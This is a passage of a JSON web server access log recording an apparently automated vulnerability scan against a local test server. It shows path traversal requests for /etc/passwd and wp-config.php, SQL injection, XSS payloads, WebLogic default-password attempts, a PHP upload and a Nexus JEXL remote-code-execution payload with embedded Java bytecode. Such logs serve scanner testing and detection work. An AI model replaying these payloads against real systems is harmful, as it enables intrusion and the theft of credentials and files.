+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/GetDocLink.ashx?link=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"j_username=weblogic&j_password=weblogic&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%7B%7BVS%C3%82%7D%7D&__VIEWSTATEGENERATOR=%C3%82%7B%7BVSG%C3%82%7D%7D&__EVENTVALIDATION=%C3%82%7B%7BEV%C3%82%7D%7D&txtID=uname%27&txtPW=passwd&hdnClientDPI=96","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapi/v1/system/accountmanage/account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-----------------------------154934846911423734231554128137\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x22297MFiexvsoEShgknG8x2RFgFnQ.php\x22\x0D\x0AContent-Type: application/x-php\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------154934846911423734231554128137--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /clients/editclient.php?id=297MFiexvsoEShgknG8x2RFgFnQ&action=update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"j_username=weblogic&j_password=weblogic1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2f.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logos_clients/1.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebInterface/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"j_username=weblogic&j_password=welcome1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?download=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/modules/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:51 +0000","request_body":"{\x22action\x22: \x22coreui_Component\x22, \x22type\x22: \x22rpc\x22, \x22tid\x22: 8, \x22data\x22: [{\x22sort\x22: [{\x22direction\x22: \x22ASC\x22, \x22property\x22: \x22name\x22}], \x22start\x22: 0, \x22filter\x22: [{\x22property\x22: \x22repositoryName\x22, \x22value\x22: \x22*\x22}, {\x22property\x22: \x22expression\x22, \x22value\x22: \x22function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \x5CndefineClass.setAccessible(true);\x5Cnx=defineClass.invoke(\x5Cn y,\x5Cn 'Exploit.Test234',\x5Cn z.getBytes('latin1'), 0,\x5Cn 3054\x5Cn);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\x5Cn\x22}, {\x22property\x22: \x22type\x22, \x22value\x22: \x22jexl\x22}], \x22limit\x22: 50, \x22page\x22: 1}], \x22method\x22: \x22previewAssets\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/extdirect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", 